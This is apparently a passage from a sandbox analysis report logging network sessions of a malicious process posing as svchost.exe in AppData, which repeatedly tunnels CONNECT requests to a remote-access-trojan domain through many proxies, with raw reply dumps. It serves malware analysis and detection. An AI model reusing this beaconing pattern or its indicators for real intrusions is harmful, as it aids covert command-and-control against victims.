                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2413192.168.2.55786244.190.9.654810043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.145330906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2414192.168.2.55774658.20.248.139900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.149332047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.880247116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.207376003 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2415192.168.2.557331117.160.250.138889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.149432898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.442502975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.125802994 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2416192.168.2.557615119.39.68.105232343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.154479027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2417192.168.2.557753185.220.226.23580843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.157821894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2418192.168.2.55776843.155.130.1821567343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.180309057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2419192.168.2.557889172.214.74.105312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.196388006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.742350101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.568056107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.965050936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.802248955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.677685022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2420192.168.2.55779943.133.70.571567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.196852922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2421192.168.2.5578083.10.93.50312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.198693991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.492794991 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2422192.168.2.557778111.90.150.109108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.201683044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2423192.168.2.557907104.18.103.1258043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.209834099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.364032984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2424192.168.2.55685878.170.135.164808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.210540056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.034569025 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2425192.168.2.557941104.17.132.798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.212551117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.366806984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2426192.168.2.557946203.30.188.2478043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.217220068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.371666908 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2427192.168.2.556697117.160.250.1638043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.225333929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.828896046 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2428192.168.2.55784920.37.207.8808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.225636005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.539906979 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2429192.168.2.557961104.16.109.2138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.226926088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.381027937 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2430192.168.2.557939159.65.77.168858543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.229341030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2431192.168.2.557967104.17.171.2358043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.229839087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.384205103 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2432192.168.2.557915154.208.10.1268043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.241894007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.402767897 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2433192.168.2.5578578.142.3.145330643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.245527029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2434192.168.2.557997104.17.62.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
